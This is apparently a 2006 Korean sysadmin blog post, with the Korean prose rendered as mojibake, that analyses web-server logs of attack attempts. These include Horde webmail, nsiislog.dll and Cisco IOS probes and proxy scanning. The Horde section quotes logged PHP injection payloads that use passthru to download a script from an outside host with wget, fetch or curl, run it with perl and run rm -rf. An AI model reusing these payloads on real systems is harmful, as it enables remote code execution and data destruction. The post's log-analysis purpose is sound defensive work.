|
Á¦ ¸ñ : À¥°ø°Ý¿¡ ´ëÇÑ À¥·Î±×µé 2¹ø°
ÀÛ¼ºÀÚ : ÁÁÀºÁøÈ£(truefeel, http://coffeenix.net/ )
ÀÛ¼ºÀÏ : 2006.5.25(¸ñ)~
Á¤¸®ÀÏ : 2006.9.18(¿ù)
'À¥°ø°Ý¿¡ ´ëÇÑ À¥·Î±×µé'¿¡ ÀÌÀº 2¹ø° À¥·Î±× ºÐ¼®(?) °á°úÀÌ´Ù. ³Ê¹«³ªµµ ¸¹Àº À¯ÇüÀÇ À¥°ø°Ý ·Î±×°¡
±×µ¿¾È ³²¾ÒÁö¸¸ ¸íÈ®ÇÏ°Ô ºÐ¼®Çϱâ Èûµç(°ü·Ã ÀڷḦ ã¾Æº¼ ¼ö ¾ø´Â) »óȲÀÌ´Ù. ÀÌ·± ½ÃÁ¡¿¡
¸ðµç ·Î±×¸¦ ºÐ¼® Á¤¸®ÇÏ´Â °ÍÀº ºÒ°¡´ÉÇÑ °ÍÀº ´ç¿¬ÇÏ°í, ´õ ¸¹Àº ºÐ¼® °á°ú¸¦ Á¦°øÇÏ·Á°í ÇÏ´Ù°¡´Â
³Ê¹«³ª ½ÃÁ¡ÀÌ ´Ê¾îÁú °Í °°¾Æ ÀÏºÎ¶óµµ Á¤¸®Çß´Ù. ±âÁ¸¿¡ ±â·ÏµÈ ·Î±×Áß ¾î¶² °ø°Ý½ÃµµÀÎÁö ÆľÇÀÌ
µÇ¸é À̱ۿ¡ Ãß°¡Çϵµ·Ï ÇÏ°Ú´Ù.
À¥°ø°ÝÀÌ ÀÖÀ» ¶§ ½ÇÁ¦ ÇØÅ·À» ´çÇßÀ» °¡´É¼º ¿©ºÎ´Â ÀÌÀü¿¡ ½è´ø ±ÛÀ» Àо±â ¹Ù¶õ´Ù.
http://coffeenix.net/board_view.php?bd_code=1352
¡Ø ÀÌ ±Û ¸¸ÅÀº MSIE¿¡¼ Å×À̺íÀÌ °¡Àå Àß Ç¥½ÃµË´Ï´Ù.
1. ½Ã½ºÅÛ ¸ð´ÏÅ͸µ Åø What's UpÀÌ ³²±ä ·Î±×
|
210.xxx.xx.xxx - - [19/Apr/2006:17:20:25 +0900] "HEAD / HTTP/1.0" 200 - "WhatsUp Professional/1.0"
210.xxx.xx.xxx - - [19/Apr/2006:17:35:33 +0900] "HEAD / HTTP/1.0" 200 - "WhatsUp Professional/1.0"
| |
- À©µµ±â¹ÝÀÇ »ó¿ë ¸ð´ÏÅ͸µ ÅøÀÎ What's UpÀÌ À¥¼¹ö°¡ »ì¾ÆÀÖ´ÂÁö üũÇϱâ À§ÇØ Á¢¼ÓÇÑ ·Î±×ÀÌ´Ù.
Âü°íÀÚ·á :
* WhatsUp ȨÆäÀÌÁö
http://www.ipswitch.com/products/whatsup/index.asp
2. ¿ÀǼҽº±â¹Ý À¥¸ÞÀÏ Horde Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
|
201.219.7.xx - - [24/Apr/2006:00:08:53 +0900] "GET //README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:54 +0900] "GET /horde//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:54 +0900] "GET /horde2//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:55 +0900] "GET /horde3//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:55 +0900] "GET /horde-3.0.9//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:56 +0900] "GET /Horde//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:56 +0900] "GET /mail//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:57 +0900] "GET /webmail//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:58 +0900] "GET /horde-3.0.1//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:58 +0900] "GET /horde-3.0.2//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:59 +0900] "GET /horde-3.0.3//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:08:59 +0900] "GET /horde-3.0.4//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:09:00 +0900] "GET /horde-3.0.5//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:09:00 +0900] "GET /horde-3.0.6//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:09:01 +0900] "GET /horde-3.0.7//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
201.219.7.xx - - [24/Apr/2006:00:09:01 +0900] "GET /horde-3.0.8//README HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
| |
|
216.65.xx.xxx - - [30/Apr/2006:06:36:30 +0900] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:30 +0900] "GET /horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:31 +0900] "GET /horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:31 +0900] "GET /pub/horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:35 +0900] "GET /horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
216.65.xx.xxx - - [30/Apr/2006:06:36:36 +0900] "GET /pub/horde-cvs/horde/services/help/ HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
| |
|
196.40.xx.xxx - - [23/Jun/2006:02:05:37 +0900] "GET /horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
196.40.xx.xxx - - [23/Jun/2006:02:05:38 +0900] "GET /services/help/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
196.40.xx.xxx - - [23/Jun/2006:02:05:38 +0900] "GET /horde-cvs/horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
196.40.xx.xxx - - [23/Jun/2006:02:05:39 +0900] "GET /pub/horde-cvs/horde/services/help/?show=about&module=;%22.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22ipbg.net%22.chr(47).%22h;perl%20h;rm%20-rf%20*%22);'. HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
| |
- IP : ¿¡Äâµµ¸£ (RC, 201.219.7.0/24)
¹Ì±¹ (216.65.0.0 - 216.65.127.255)
ÄÚ½ºÅ¸¸®Ä«(CR, 196.40.85.128/25)
Âü°í ÀÚ·á :
3. À©µµ ¹Ìµð¼ ¼ºñ½º ISAPI nsiislog.dll POST ¿À¹öÇ÷οì Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
|
202.100.xxx.xxx - - [24/Apr/2006:11:53:13 +0900] "GET /scripts/nsiislog.dll" 404 - "-"
202.100.xxx.xxx - - [24/Apr/2006:11:53:54 +0900] "GET /scripts/nsiislog.dll" 404 - "-"
| |
- IP : Áß±¹(CN, 202.100.96.0 - 202.100.127.255)
- 2003³â 6¿ù¿¡ ³ª¿Â Ãë¾àÁ¡À̸ç, Windows 2000¼¹ö¿¡ ÇØ´çµÈ´Ù.
80Æ÷Æ®·Î 'GET /scripts/nsiislog.dll /HTTP/1.0' ¸¦ ¿äûÇßÀ» ¶§ ¼¹ö¿¡¼ 'NetShow ISAPI Log Dll'
°ªÀ» »Ñ·ÁÁشٸé Ãë¾àÁ¡ÀÌ ÀÖ´Â ½Ã½ºÅÛÀÌ´Ù.
Âü°íÀÚ·á :
* Microsoft Media Services ISAPI nsiislog.dll POST Overflow
http://www.osvdb.org/4535
* Windows Media Services Remote Command Execution #2
http://archives.neohapsis.com/archives/bugtraq/2003-06/0211.html
* Successful attack using MS03-022 vuln
http://lists.sans.org/pipermail/unisog/2003-September/022422.html
4. proxy_scanner ÅøÀ» ÀÌ¿ëÇÑ Proxy scanning ·Î±×
- IP : Áß±¹ (CN, 211.100.32.0 - 211.100.95.255)
Áß±¹ (CN, 61.135.0.0 - 61.135.255.255)
- 2004³â¿¡ Áß±¹ ÇØÄ¿¿¡ ÀÇÇØ ¸±¸®ÁîµÈ Proxy Scanning Åø 'proxy_scanner'À» ÀÌ¿ëÇؼ Proxy »ç¿ë
°¡´É¿©ºÎ¸¦ È®ÀÎÇϱâ À§ÇÑ ¿äûÀÌ´Ù.
- URL ¿äû Çü½ÄÀº ´ÙÀ½°ú °°´Ù.
http://check.$ip_address.v.80.(pdx8|PCN22|mt1|pw1).super.proxy.scanner.(i.thu.cn|ii.9966.org)/Provy_OK.html
check...super.proxy.scanner.(i.thu.cn|ii.9966.org)ÀÇ È£½ºÆ®´Â ¸ðµÎ 61.135.170.153 IP·Î lookupµÇ´Â
°ÍÀ¸·Î º¸¾Æ ¸î¸î IP(DNSµî)¸¸ Á¦¿ÜÇÏ°í '* IN A 61.135.170.153'À¸·Î DNS ¼³Á¤µÇ¾î ÀÖ´Â °ÍÀ¸·Î º¸ÀδÙ.
- ÀÌ µé À¥¼¹ö´Â lighttpd/1.4.11À» »ç¿ëÇÑ´Ù. (80Æ÷Æ®·Î telnetÇؼ º¸¸é ½±°Ô È®ÀÎ °¡´É)
Âü°íÀÚ·á :
* What's a super.proxy.scanner and why is it in my logs?
http://isc.sans.org/diary.php?storyid=1298
* Proxy Probes
http://www.splunk.com/splunkbin/426
5. Cisco ISO HTTPÀ» ÅëÇØ admin ±ÇÇÑÀ» °®À» ¼ö ÀÖ´Â Ãë¾àÁ¡À» ÀÌ¿ëÇÑ °ø°Ý
|
81.225.xx.xx - - [29/Aug/2006:13:23:45 +0900] "GET /level/16/exec/show%20conf HTTP/1.1" 404 - "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95; PMF Master V3.0)"
| |
- IP : ½º¿þµ§(SE, 81.224.0.0 - 81.236.255.255)
- ÀÌÀü À¥·Î±× ºÐ¼® ±ÛÀÇ '14. Cisco SwitchÀÇ ¾ÆÁÖ ¿¹Àü HTTP Ãë¾àÁ¡(2001³â)À» ÀÌ¿ëÇÑ °ø°Ý'
Ç׸ñÀ» Âü°íÇϱ⠹ٶõ´Ù.
- ÀÌ Ãë¾àÁ¡Àº http://Switch_IP/level/$NUMBER/exec/.... URLÀ» ÀÌ¿ëÇؼ full admin±ÇÇÑÀ» °®À»
¼ö ÀÖÀ¸¸ç /level/$NUMBER/exec/... ¿¡¼ $NUMBER´Â 16¿¡¼ 99»çÀÇ ¼ýÀÚÀÌ´Ù.
- Cisco Global Exploiter¶ó´Â ÀÚµ¿ÈµÈ ÅøÀ» ÀÌ¿ëÇؼ CISCOÀÇ Ãë¾àÁ¡À» ½ºÄ³´×ÇÏ´Â ÅøÀÌ ÀÖ´Ù.
Âü°í ÀÚ·á :
* Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
http://www.securityfocus.com/bid/2936
* Multiple Cisco Exploit Codes
http://www.securiteam.com/exploits/5OP0L1FCAE.html
http://downloads.securityfocus.com/vulnerabilities/exploits/ciscoMultipleVulnsExploit.pl
|